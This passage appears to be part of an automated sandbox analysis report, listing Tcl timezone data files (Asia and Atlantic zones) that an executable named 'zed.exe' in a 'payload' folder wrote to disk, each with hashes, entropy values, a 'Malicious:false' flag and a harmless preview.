                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Vladivostok) {.. {-9223372036854775808 31651 0 LMT}.. {-1487321251 32400 0 +09}.. {-1247562000 36000 0 +11}.. {354895200 39600 1 +11}.. {370702800 36000 0 +10}.. {386431200 39600 1 +11}.. {402238800 36000 0 +10}.. {417967200 39600 1 +11}.. {433774800 36000 0 +10}.. {449589600 39600 1 +11}.. {465321600 36000 0 +10}.. {481046400 39600 1 +11}.. {496771200 36000 0 +10}.. {512496000 39600 1 +11}.. {528220800 36000 0 +10}.. {543945600 39600 1 +11}.. {559670400 36000 0 +10}.. {575395200 39600 1 +11}.. {591120000 36000 0 +10}.. {606844800 39600 1 +11}.. {622569600 36000 0 +10}.. {638294400 39600 1 +11}.. {654624000 36000 0 +10}.. {670348800 32400 0 +10}.. {670352400 36000 1 +10}.. {686077200 32400 0 +09}.. {695754000 36000 0 +11}.. {701798400 39600 1 +11}.. {717523200 36000 0 +10}.. {733248000 39600 1 +11}.. {748972800 36000 0 +10}.. {7
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2058
                                                                                                                                                                                                                                            Entropy (8bit):3.7081033128260934
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5h+r1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFY7rRWjYuhUmgr2j:K5PhtjLiII2ZFlgm
                                                                                                                                                                                                                                            MD5:E43E5F0EA7C4575525BAB130984DCDCC
                                                                                                                                                                                                                                            SHA1:2D715749469FEA51A8E25D1F4F8DC4FF9178817D
                                                                                                                                                                                                                                            SHA-256:3BEF13638C46F16435D326C675907E61BB68C8173153CED3359E983BE0E413E5
                                                                                                                                                                                                                                            SHA-512:27954FEC865031BC363CFDE94E97B3B19836A6F777646EA4AAB12ECCAEE6D60A0C690711EA192B917AC717F94A01D1EF64BAE97DF968069CC12415971B070498
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yakutsk) {.. {-9223372036854775808 31138 0 LMT}.. {-1579423138 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {76470
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):244
                                                                                                                                                                                                                                            Entropy (8bit):4.692243303623333
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKs5XDm2OHGVQoHvZN6FCDx+UIFDVkvScHbY/s5UIAy:MB862KTmdHGuCvZNNkkHH3Sy
                                                                                                                                                                                                                                            MD5:D45766D30074719C9A88ACE8BB53204B
                                                                                                                                                                                                                                            SHA1:69B333DFCCCCEB66DD0F7DC28B272BB10769B6B0
                                                                                                                                                                                                                                            SHA-256:2526557810747E78E713AE09BC305621A80FAEECF8D441632E7825738D4C79CB
                                                                                                                                                                                                                                            SHA-512:5255DEED72D7D13862A4D6BED7E0458C099D2EF5A1B41536CAA7C0E65A61DE8B8D1AD62AD44559F970B6613ADFB3862778D1CC99B9A05CB5BBCA7F0202B5A5B2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yangon) {.. {-9223372036854775808 23087 0 LMT}.. {-2840163887 23087 0 RMT}.. {-1577946287 23400 0 +0630}.. {-873268200 32400 0 +09}.. {-778410000 23400 0 +0630}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2095
                                                                                                                                                                                                                                            Entropy (8bit):3.704641905144701
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5ievNhYvm1qv7vXIovPvSvlDvtvuovKKvKcNvHvAvivBvqvvEyv8vlvEv+v4v+v+:/Nupj40H6l75FKCKcZP8qdyEaoBAWkW+
                                                                                                                                                                                                                                            MD5:D4DABA407BB8A10E4961D1DE5D9781D1
                                                                                                                                                                                                                                            SHA1:6933DE65336331BD90E2BEC6AEA0609B16DAEDC9
                                                                                                                                                                                                                                            SHA-256:2C78699EFC60758B8F8D0D1DEEDFDED5E65C65EBF3082B23E60BDEA8BF8FBCFE
                                                                                                                                                                                                                                            SHA-512:459E2187FAA66414F5CE934C335F563DFD2FA5316B86A54D1A29123A0460AFD65B7CE46629BD6A070A14CB6873A28A2F2803DE5FF4F29EA610712EB07FAD303F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yekaterinburg) {.. {-9223372036854775808 14553 0 LMT}.. {-1688270553 13505 0 PMT}.. {-1592610305 14400 0 +04}.. {-1247544000 18000 0 +06}.. {354913200 21600 1 +06}.. {370720800 18000 0 +05}.. {386449200 21600 1 +06}.. {402256800 18000 0 +05}.. {417985200 21600 1 +06}.. {433792800 18000 0 +05}.. {449607600 21600 1 +06}.. {465339600 18000 0 +05}.. {481064400 21600 1 +06}.. {496789200 18000 0 +05}.. {512514000 21600 1 +06}.. {528238800 18000 0 +05}.. {543963600 21600 1 +06}.. {559688400 18000 0 +05}.. {575413200 21600 1 +06}.. {591138000 18000 0 +05}.. {606862800 21600 1 +06}.. {622587600 18000 0 +05}.. {638312400 21600 1 +06}.. {654642000 18000 0 +05}.. {670366800 14400 0 +05}.. {670370400 18000 1 +05}.. {686095200 14400 0 +04}.. {695772000 18000 0 +06}.. {701816400 21600 1 +06}.. {717541200 18000 0 +05}.. {733266000 21600 1 +06}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2029
                                                                                                                                                                                                                                            Entropy (8bit):3.6487650030366106
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5O4GeuadYlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPBUUUl2ue/:5xKdsUf8mFpNWFnyLCPYmPJSi3sh4
                                                                                                                                                                                                                                            MD5:2CFA7C55D0731D24679CA5D5DC716381
                                                                                                                                                                                                                                            SHA1:2BB66783D75C71E76409365757980FBC15F53231
                                                                                                                                                                                                                                            SHA-256:20871FA6AA959DDFB73D846271B4A568627B564CFC08A11BDD84B98C2F2019A3
                                                                                                                                                                                                                                            SHA-512:CAB10A48859B2C0B2CC7C56E0AA530AE7E506A4986BADC5ED974D124BD46DB328B50C423F83FCFD52D31962A249EEFC10351798B86D51EDA500F412C8D42E6BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yerevan) {.. {-9223372036854775808 10680 0 LMT}.. {-1441162680 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {701823600 14400 1 +03}.. {717548400 10800 0 +03}.. {733273200 14400 1 +03}.. {748998000 10800 0 +03}.. {764722800 14400 1 +03}.. {780447
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9879
                                                                                                                                                                                                                                            Entropy (8bit):3.557602151081988
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:K35nZPOUYySoluItljncxelTMwtrayE6x5sETNek/CyNzybxYKmX6SXL/XbEcygI:K940pb6cL/b3Ldr9Q7TMq+ML
                                                                                                                                                                                                                                            MD5:E7F2A3EE0362E9ED3ECBAD24168AD098
                                                                                                                                                                                                                                            SHA1:98832274F6D9B641B809123D1272A1C04EEAA177
                                                                                                                                                                                                                                            SHA-256:6B3609BE4E93D21A2AB492594EDD387931E2C787E8471C9F2D3A677F34002D8F
                                                                                                                                                                                                                                            SHA-512:C48A76F8251AE455C759CB98802E40B3BEF716FD8E7441B6DE0242942C913367E3572B7C871082E97CA9BE67EC7DC37F8D01C438965217AC0EC36AD508DCE0D4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Azores) {.. {-9223372036854775808 -6160 0 LMT}.. {-2713904240 -6872 0 HMT}.. {-1830376800 -7200 0 -02}.. {-1689548400 -3600 1 -01}.. {-1677794400 -7200 0 -02}.. {-1667430000 -3600 1 -01}.. {-1647730800 -7200 0 -02}.. {-1635807600 -3600 1 -01}.. {-1616194800 -7200 0 -02}.. {-1604358000 -3600 1 -01}.. {-1584658800 -7200 0 -02}.. {-1572735600 -3600 1 -01}.. {-1553036400 -7200 0 -02}.. {-1541199600 -3600 1 -01}.. {-1521500400 -7200 0 -02}.. {-1442444400 -3600 1 -01}.. {-1426806000 -7200 0 -02}.. {-1379286000 -3600 1 -01}.. {-1364770800 -7200 0 -02}.. {-1348441200 -3600 1 -01}.. {-1333321200 -7200 0 -02}.. {-1316386800 -3600 1 -01}.. {-1301266800 -7200 0 -02}.. {-1284332400 -3600 1 -01}.. {-1269817200 -7200 0 -02}.. {-1221433200 -3600 1 -01}.. {-1206918000 -7200 0 -02}.. {-1191193200 -3600 1 -01}.. {-1175468400 -7200 0 -02}.. {-1127689
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8784
                                                                                                                                                                                                                                            Entropy (8bit):3.833553120942514
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:ZRBHksL3zq6bCvyjvspNWMPm4bPJWXtRbALtuFW4ng2CEBJuQaeEy9P19OBYEi/+:ft0CC
                                                                                                                                                                                                                                            MD5:B04E22B9B42722013941169B5D04DEA2
                                                                                                                                                                                                                                            SHA1:32B96A7D9504D5022A6C4E2D310E95B5F062947F
                                                                                                                                                                                                                                            SHA-256:099C3BEFBA3B4C00AE19BC53D475A52B32FAC9B36EC823C8EAEFC7D00F78F388
                                                                                                                                                                                                                                            SHA-512:8B93BCA1E923B7A43F2EB0889216E8FF991D13CB8D25BD300310ED7CD8537DBD858E8F422C9B52AE2F52F7C1CB450EF0B7C5C1B3AE547C9C1E18E2A851569DD5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Bermuda) {.. {-9223372036854775808 -15558 0 LMT}.. {-2524506042 -15558 0 BMT}.. {-1664307642 -11958 1 BMT}.. {-1648932042 -15558 0 BMT}.. {-1632080442 -11958 1 BMT}.. {-1618692042 -15558 0 BST}.. {-1262281242 -14400 0 AT}.. {-882727200 -10800 1 ADT}.. {-858538800 -14400 0 AST}.. {-845229600 -10800 1 ADT}.. {-825879600 -14400 0 AST}.. {-814384800 -10800 1 ADT}.. {-793825200 -14400 0 AST}.. {-782935200 -10800 1 ADT}.. {-762375600 -14400 0 AST}.. {-713988000 -10800 1 ADT}.. {-703710000 -14400 0 AST}.. {-681933600 -10800 1 ADT}.. {-672865200 -14400 0 AST}.. {-650484000 -10800 1 ADT}.. {-641415600 -14400 0 AST}.. {-618429600 -10800 1 ADT}.. {-609966000 -14400 0 AST}.. {-586980000 -10800 1 ADT}.. {-578516400 -14400 0 AST}.. {-555530400 -10800 1 ADT}.. {-546462000 -14400 0 AST}.. {-429127200 -10800 1 ADT}.. {-415825200 -14400 0 AST}.. {1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6856
                                                                                                                                                                                                                                            Entropy (8bit):3.8064107143060752
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:KXVuHfXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:KXVQbkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                                            MD5:8ABD279386C50705C074EEE18BF5AE59
                                                                                                                                                                                                                                            SHA1:C392231DBE744F5942DA4BFAC8AD0ABEBAEA0BF3
                                                                                                                                                                                                                                            SHA-256:2026944DCDEBC52F64405E35119F4CF97EA9AA1E769498730880B03F29A2B885
                                                                                                                                                                                                                                            SHA-512:3095759D01AC7EEA25E427CA38E8A0395BEFA7250E7A0C1327BF9D61F07F4570CDF7313FBE6695973EB0DD66D201C6C63591CC0DA8A1E0029926DC7056F4C95B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Canary) {.. {-9223372036854775808 -3696 0 LMT}.. {-1509663504 -3600 0 -01}.. {-733874400 0 0 WET}.. {323827200 3600 1 WEST}.. {338950800 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}.. {749005200 0 0 WET}.. {764730000 3600 1 WEST}.. {780454800 0 0 WET}.. {796179600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):246
                                                                                                                                                                                                                                            Entropy (8bit):4.637993677747699
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2RQ7RfDm2OHDoH1JlvQV/FFrR3FcykVvQV/FFf+nmwV:MB86267RLmdHDC1w/FH3FcyL/FomwV
                                                                                                                                                                                                                                            MD5:1581C6470850E0C9DB204975488B1AF8
                                                                                                                                                                                                                                            SHA1:6933ED13F18AD785CEDF0837F86EFAC671297A85
                                                                                                                                                                                                                                            SHA-256:2EA59ACDB5BBDD3C6ABCEEA456838A5CA57371A3D2BB93604B37F998ED8B9D4D
                                                                                                                                                                                                                                            SHA-512:9FFFA013D82CEFF6F447521C19270ECDD71152F23670164423E6013FEC46253C62D2CB79B42630BD786BD113F27369E746CA981DD17E789F7571F473B47247C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Cape_Verde) {.. {-9223372036854775808 -5644 0 LMT}.. {-1830376800 -7200 0 -02}.. {-862610400 -3600 1 -01}.. {-764118000 -7200 0 -02}.. {186120000 -3600 0 -01}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.709193799640151
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqLG4E23vXHAIgvMG4EeRRL/2RQqG4EZrB/4RQqG4E1n:SlSWB9vsM3yCPHAIgvoRN/2RQ1rB/4Ri
                                                                                                                                                                                                                                            MD5:601EB889A87F9CAD6F1DF4D1AB009FAE
                                                                                                                                                                                                                                            SHA1:EB43C253A48755442A67A2408D7E3295549F831C
                                                                                                                                                                                                                                            SHA-256:64FB8CAD17CD36666C7027AAD01344FEF659B13699EEF1942365842F8ED2170E
                                                                                                                                                                                                                                            SHA-512:9CFC4A446ED6A3BEF6C26AE57324F10A970EE2ADD6933130447FAD6A3DB538841F2490DD461AF5776FACD9BD2CDC4A83247DFA6B34802AE844DDC6D4C37B28EA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Atlantic/Faroe)]} {.. LoadTimeZoneFile Atlantic/Faroe..}..set TZData(:Atlantic/Faeroe) $TZData(:Atlantic/Faroe)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6796
                                                                                                                                                                                                                                            Entropy (8bit):3.804838552487436
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:96ufXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:/bkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                                            MD5:F97CC7EB9C52D00177BFF4715832FCD5
                                                                                                                                                                                                                                            SHA1:CD9DCBB5E6ADD6EA91C8F142957EC229FC7F6DA3
                                                                                                                                                                                                                                            SHA-256:795F438E7F01342D5F25ECCDD09FCE65C03C5D2D561B9B5191301D57EC16B850
                                                                                                                                                                                                                                            SHA-512:9586289FEB6C597160011A47432F0AC40000483FA2E579BD89046EFD33E98DDAD652B792FD80CEDEB4CD87B6439A7B473F25F1B7375BC75353CBAF9F77E1084E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Faroe) {.. {-9223372036854775808 -1624 0 LMT}.. {-1955748776 0 0 WET}.. {347155200 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}.. {749005200 0 0 WET}.. {764730000 3600 1 WEST}.. {780454800 0 0 WET}.. {796179600 3600 1 WEST}.. {811904400 0 0 WET}.. {828234000 3600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.957633978425468
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/2RQqG0EHEcAg/h8QahV:SlSWB9vsM3ymhVoPHAIgoh6N/2RQaK85
                                                                                                                                                                                                                                            MD5:95C2D55CCE5809089CDB041EA3D464F8
                                                                                                                                                                                                                                            SHA1:B395F5F26CE979BDF2B9E2CB51C06929AED11A6C
                                                                                                                                                                                                                                            SHA-256:11BF0746F95BA01807D3B34C8FAE3FF4AE9DB5E4E6BC0CB8B36906CC3F44EDE5
                                                                                                                                                                                                                                            SHA-512:AB2BE22E95A7C36E18EBA1BB63B3930A523ED793E43A3F597A8F63AE2F0E44436C39144BC136E7E5716D7FCBFAE7F1FAF36BCFFCF9C8D51151FF25BB14D6F8B5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Atlantic/Jan_Mayen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9709
                                                                                                                                                                                                                                            Entropy (8bit):3.80455694200614
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:hZUiLbMsf/ss0qKd+aKyUXtOZHY1SCOcesoQivoKbFVCdm1rXWNXyCXTOuUbkIaq:hZZDQX1rWJysukysLE3+sSGjT
                                                                                                                                                                                                                                            MD5:AC6647F9B53B5958214EC3F3B78A4D85
                                                                                                                                                                                                                                            SHA1:7355622AF99296F069F73899D5C70941C207F676
                                                                                                                                                                                                                                            SHA-256:B2A0D0DDC26806A05B2BE806CA3F938DB12A3FA40110B8B21FD3F04EFED3A531
                                                                                                                                                                                                                                            SHA-512:07569CA4D5DC6D57D91D6FDC370671A7546B73BA653D094E1B501D33570F7700727AD7FF2A083BC79E9EDE807C47E7A5604BEF5803F290B2F277C51DEF10FA6B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Madeira) {.. {-9223372036854775808 -4056 0 LMT}.. {-2713906344 -4056 0 FMT}.. {-1830380400 -3600 0 -01}.. {-1689552000 0 1 +00}.. {-1677798000 -3600 0 -01}.. {-1667433600 0 1 +00}.. {-1647734400 -3600 0 -01}.. {-1635811200 0 1 +00}.. {-1616198400 -3600 0 -01}.. {-1604361600 0 1 +00}.. {-1584662400 -3600 0 -01}.. {-1572739200 0 1 +00}.. {-1553040000 -3600 0 -01}.. {-1541203200 0 1 +00}.. {-1521504000 -3600 0 -01}.. {-1442448000 0 1 +00}.. {-1426809600 -3600 0 -01}.. {-1379289600 0 1 +00}.. {-1364774400 -3600 0 -01}.. {-1348444800 0 1 +00}.. {-1333324800 -3600 0 -01}.. {-1316390400 0 1 +00}.. {-1301270400 -3600 0 -01}.. {-1284336000 0 1 +00}.. {-1269820800 -3600 0 -01}.. {-1221436800 0 1 +00}.. {-1206921600 -3600 0 -01}.. {-1191196800 0 1 +00}.. {-1175472000 -3600 0 -01}.. {-1127692800 0 1 +00}.. {-1111968000 -3600 0 -01}.. {-
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.910514445868106
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2RQqGsA/8rVDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2RQjQD4
                                                                                                                                                                                                                                            MD5:ECB480DA99D29C0ACE67426D45534754
                                                                                                                                                                                                                                            SHA1:784CF126B030C3D883EE541877E6181F795C9697
                                                                                                                                                                                                                                            SHA-256:BDA015714260001BAE2848991DD21E802580BE2915797E5DABC376135D1C5246
                                                                                                                                                                                                                                            SHA-512:54C1B20E45C7C73354DCD4E0F4444720771820ED10B282F745DC391BEADEAEDC629BEF97B1908FB62CDAEC915D32AF1F54FC6AA9DC83E317E7CE19FC2586EF28
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Atlantic/Reykjavik) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):160
                                                                                                                                                                                                                                            Entropy (8bit):5.011466665416709
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2RQqGtlN62/EiMXGm2OHXT14YoHvhFvdQVIyV:SlSWB9eg/2RQrlo2MiDm2OHXqYoHvTFS
                                                                                                                                                                                                                                            MD5:3B310BB8C90CA716DC1AC5A697ACA9CD
                                                                                                                                                                                                                                            SHA1:CD583F49478DCDAD91EF78539502C6FC62945C1E
                                                                                                                                                                                                                                            SHA-256:51BFABCB3388107753A3C1A8CF31118E6627132BAA09B9878D9E7CEDBEBB4886
                                                                                                                                                                                                                                            SHA-512:F593B7A1FAF0EA6B42D5EE86C20C9A8F5CD7ACD9B30EF7755E45ECAFEA8752C32E4CF4BEDF531F494E59D9F0C49CCC6FCA077292E20794AA265DFC0A56DFE579
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/South_Georgia) {.. {-9223372036854775808 -8768 0 LMT}.. {-2524512832 -7200 0 -02}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.880390141563645
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2RQqGt4r+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2RQr4rV
                                                                                                                                                                                                                                            MD5:2C73A963F515376A46762CE153AAF5C5
                                                                                                                                                                                                                                            SHA1:996C3C93DFAD89EA80AC5DFA1DFBD7CECD9ED28D
                                                                                                                                                                                                                                            SHA-256:1C9CA8966FC8BD0BE70F4A187E17E56FB99139BC88C392E82BA2E23E23111C54
                                                                                                                                                                                                                                            SHA-512:35A9ADC047DB058D71C21FC4ECB57CD14B0D9BA4416506763D1800D72CE6C9E81636F332AAD3533616F05C86F90A60416BD4065C5F832A51AA3DC186218BDCAE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Atlantic/St_Helena) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2256
                                                                                                                                                                                                                                            Entropy (8bit):3.662522763865322
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:506KSBSdSs2SbSwGSyPU3lSsS5SGScSo/SkSuShSceS3SBSc7XSiSgSwSd/SJkS6:JKU+Ew0FU1TuhrR//tOIoOjXZfDWSkPR
